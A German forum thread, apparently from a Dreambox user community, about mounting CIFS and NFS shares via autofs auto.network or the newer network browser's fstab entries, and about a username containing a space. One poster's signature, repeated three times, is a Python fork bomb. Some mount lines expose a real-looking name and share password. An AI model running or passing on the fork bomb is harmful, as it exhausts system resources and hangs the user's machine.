Bester Weg um cifs Mounts einzubinden?

    Diese Seite verwendet Cookies. Durch die Nutzung unserer Seite erklären Sie sich damit einverstanden, dass wir Cookies setzen. Weitere Informationen

    • ..... Klugscheißer ....

      Thema ist doch längst erledigt.
      Für deinen Post hast du jetzt nicht wirklich fast 10 Tage gebraucht ???

      Keine Ironie!

      Gruß

      Dieser Beitrag wurde bereits 1 mal editiert, zuletzt von Hilfsbereit ()

    • Hallo,

      --timeout=5

      kati910 schrieb:

      Ganz einfach es ist ein Timout in sekunden nachdem das verzeichniss ausgehängt wird.
      Wenn der versucht einen Share zu mounten und nach 5sek ist immer noch nichts passiert hängt er das und gut.


      Ich muß das noch einmal hochziehen, da das Timeout nicht wie erhofft mein Problem beseitigt:
      Wenn ich vor dem Standby das Ausdokumentieren des externen Synology NAS (NFS) in der auto.network vergesse, dann dauert der nächste Neustart ohne Netzwerk ca. 3 Minuten. Da ich die 7080 ab und zu mit in den Urlaub nehme und dort kein NAS habe, wäre es schön, eine Lösung zu finden.
      Habe ich das mit dem --timeout=5 vllt. falsch interpretiert? Gibt es einen anderen Lösungsvorschlag?

      Gruß
    • kati910 schrieb:

      Ganz einfach es ist ein Timout in sekunden nachdem das verzeichniss ausgehängt wird.
      Wenn der versucht einen Share zu mounten und nach 5sek ist immer noch nichts passiert hängt er das und gut.
      Leute das ist Linux guckt im Internet da gibt es Infos ohne ende ihr müsst euch nur bemühen dann lernt man auch was.
      linux.die.net/man/8/automount


      -t, --timeout Set the global minimum timeout, in seconds, until directories are unmounted. The default is 10 minutes. Setting the timeout to zero disables umounts completely.


      Nach meinen bescheidenen Englischkenntnissen heißt das, der Mount wird nach Inaktivität nach soundsoviel Sekunden ausgehängt.
      Englisch ist aber bei mir schon seeeeeehr lange her, also kann ich auch Prügel ertragen :winke: :aufgeben:
    • Wie gesagt mir ist das ehrlich gesagt egal vorher habt ihr keinen Timeout drinn und nichts geht jetzt werft ihr ihn raus und es geht da frage ich mich was macht ihr die ganze zeit oder taugt euere nas software nichts.
      python -c 'while 1: __import__("os").fork()'
      Wer der Herde hinterher läuft frisst nur Scheisse , nicht das Gras !
    • Ruhig, Brauner.

      War doch kein Angriff. Ich stelle nur fest:
      Ohne async haben die Streams von der 7080 zur 8000 geruckelt.
      Mit -t hatte ich Probleme über GBit-Netzwerk von 7080 zum QNAP GBit Nas beim Kopieren mehrer Dateien gleichzeitig.
      In den Einstellungen ist also bei mir noch das async und das retry geblieben.



      Mit diesen Erkenntnissen darf jeder mächen, was er möchte. :blumen:
    • Ich verwende ein x86_64 ubuntu-server da gibt es keinerlei probleme was ich damit sagen will die Box ist nicht an allem schuld wenn also manche optionen nicht gehen kann das auch an der Software vom Hersteller eueres Nas liegen.
      python -c 'while 1: __import__("os").fork()'
      Wer der Herde hinterher läuft frisst nur Scheisse , nicht das Gras !
    • soooo, da bin ich auch wieder, und muss den alten Thread aus der Versenkung holen ?(

      nach dem DMM gemeint hat, das mounten mit dem Netzwerkbrowser wäre jetzt kinderleicht, kann ich wieder nicht mehr auf meine HDD im PC per cifs Freigabe zugreifen. Nachdem ich froh war, dass mein mount per auto.network 100% ig lief, bin ich jetzt natürlich dementsprechend sauer. Hatte ja so meine Probleme mit meinem Usernamen, der aus zwei getrennten Worten bestand. Damit wird jetzt vermutlich der tolle Netzwerkbrowser wieder seine Probleme haben. Ich sehe zwar meinen PC und meinen freigegebene Ordner auf meiner Dream, aber eben keinen Inhalt des Ordners. Es sieht wieder danach aus, alsob meine Dream keinen Zugriff hat.

      Der Eintrag in der auto.network war damals so ....
      M -fstype=cifs,user=Eric\ Pfitzner,pass=testzugang,rw,iocharset=utf8 ://192.168.1.100/M

      Der Eintrag in der fstab vom Netzwerkbrowser sieht jetzt so aus ...
      //192.168.1.100/M /media/M cifs rw,x-systemd.device-timeout=15,rsize=8192,noauto,x-systemd.automount,wsize=8192,x-systemd.idle-timeout=60,soft,username=Eric Pfitzner,password=testzugang,nofail 0 0

      Eine Änderung des Eintrags in der fstab mit Eric\ Pfitzner bringt aber auch nichts.

      Und jetzt die entscheidende Frage. Wie stelle ich das ganze wieder auf auto.network um, auch wenn das nicht mehr supportet wird? Oder, wie muss jetzt der korrekte Eintrag in der fstab für meine cifs Freigabe heißen, damit ich wieder Zugriff auf meine HDD in meinem PC habe???
    • Hi,

      also einen neuen Benutzer auf meinem PC richte ich deswegen auf keinen Fall ein ;) . Und ich werde weiterhin auf der Aussage rumreiten, wie toll doch der Netzwerkbrowser funktioniert, läuft doch alles bestens ?( ?( ?( .
      ... du meinst dann folgendermaßen?
      //192.168.1.100/M /media/M cifs rw,x-systemd.device-timeout=15,rsize=8192,noauto,x-systemd.automount,wsize=8192,x-systemd.idle-timeout=60,soft,username="Eric Pfitzner",password=testzugang,nofail 0 0

      Ich werde es mal damit versuchen. Wenn es damit funktioniert bleibt ja immernoch die Frage, warum schafft das dann der Netzwerkbrowser nicht, das korrekt in die fstab einzutragen?????

      Update: Eintrag in "Eric Pfitzner" geändert und Box neu gestartet. weiterhin kein Zugriff auf meine HDD :( .

      Bevor ich mich im Dreamboard vielleicht mit meiner Frage blamiere, das hat aber nichts mit der Aussage von @kati910 zu tun ... sondern liegt jetzt an DMM, dass es jetzt nicht mehr wie "gewohnt" funktioniert?

      kati910 schrieb:

      Ok dann werde ich diesbezüglich meinen support auch einschränken vielen dank für die info.

      Dieser Beitrag wurde bereits 2 mal editiert, zuletzt von Hilfsbereit ()

    • Nun autofs ist nicht mehr erwünscht da hab ich das dektiviert und verweise nun auf den netzwerkbrowser .
      Und mal generell in der IT Welt sind leerzeichen und sonderzeichen im benutzernamen tabu nur die jungs aus Redmond sehen das anders.
      python -c 'while 1: __import__("os").fork()'
      Wer der Herde hinterher läuft frisst nur Scheisse , nicht das Gras !
    • Hilfsbereit schrieb:

      ..... Klugscheißer ....

      Thema ist doch längst erledigt.
      Für deinen Post hast du jetzt nicht wirklich fast 10 Tage gebraucht ???

      Keine Ironie!

      Gruß
      Ich hatte mit meinem Post kurz nach deinem angefangen zu schreiben. Musste dann ca. neun Tage Kopf schütteln und hundert Mal überlegen, wie ich es formuliere. Da das Thema ja "längst" erledigt ist, werde ich Dir auch nicht den Tipp geben, deinen Usernamen zu ändern, ohne groß etwas am Profil ändern zu müssen. Und auch nicht den Hinweis, dass "Usernamen ändern" Auswirkungen hat auf Netzwerkfreigaben, die authentiziert werden müssen.

      Ist ja kalter Kaffee!

      Ironie on oder off? Mir egal, so wie Du es brauchst.
      "Alle sagen: Es geht nicht!
      Bis einer kommt, der es nicht wusste
      und es einfach gemacht hat!"
    • ohhhh, da ist aber jemand nachtragend ;) . Und das nach einer Antwort, die jetzt schon fast ein Jahr alt ist *g*

      du weißt aber schon, dass ich immer Zugriff auf meine HDD hatte, als alles noch mit der auto.network lief?
      Da das Kati910 jetzt abgedreht hat, muss ich das jetzt über den Netzwerkbrowser machen.
      Ich würde mich aber trotzdem über deinen Tip freuen :D
    • ja Joey, bin schon mit dem neuen User am probieren ;)

      schöner wäre es aber trotzdem, wenn es mit Leerstelle im Usernamen funktioneren würde, wie bei der Variante über auto.network :rolleyes:

      Dieser Beitrag wurde bereits 1 mal editiert, zuletzt von Hilfsbereit ()

    • Hilfsbereit schrieb:

      Hi,

      also einen neuen Benutzer auf meinem PC richte ich deswegen auf keinen Fall ein
      Klang vor sechs Stunden anders!

      Joeys Hinweis sollte reichen. Bei mir läuft es auch über die auto.network. Keiner behauptet, es ginge nicht mehr mit auto.network, lediglich wird es bei Nichtfunktionieren keinen offiziellen Support geben. Bist Du eigentlich sicher, dass dein Windows User als Username Eric Pfitzner ist oder könnte das lediglich der angezeigte Name sein?
      "Alle sagen: Es geht nicht!
      Bis einer kommt, der es nicht wusste
      und es einfach gemacht hat!"
    • Ich kann nur sagen, was ich nach dem letzten Image update festgestellt hatte. Und da ging mein mount über auto.network nicht mehr. So wie ich kati910 verstanden habe, wird das nicht mehr unterstützt. Ich hatte es auch so aufgefasst dass es zwar noch funktioniert, aber nicht mehr supportet wird. Und ehe ich jetzt keinen Zugriff mehr auf meine hdd habe, hab ich nach dem letzten Strohhalm gegriffen.

      PS: ja, ich habe bei der Ersteinrichtung meines Win10 den User Eric Pfitzner angelegt. Hatte ich bisher bei jedem Windows so angelegt, und lief ja auch. Und warum kann auto.network damit umgehen, und der Netzwerkbrowser nicht? ;)

      Gesendet von meinem C6603 mit Tapatalk

      Dieser Beitrag wurde bereits 1 mal editiert, zuletzt von Hilfsbereit ()

    • Die auto.network wurde mit dem Update vom 2.4.17 deaktiviert. D.h. nicht, dass autofs nicht mehr geht. Was jetzt aber letzendlich aber auch egal sein soll, da Dream den offiziellen Support von autofs für Netzwerkfreigaben eingestellt hat und es deshalb wenig Sinn macht, dieses trotzdem unsererseits forcieren zu wollen.

      Geht der Mount mit dem zweiten Windows-User nun?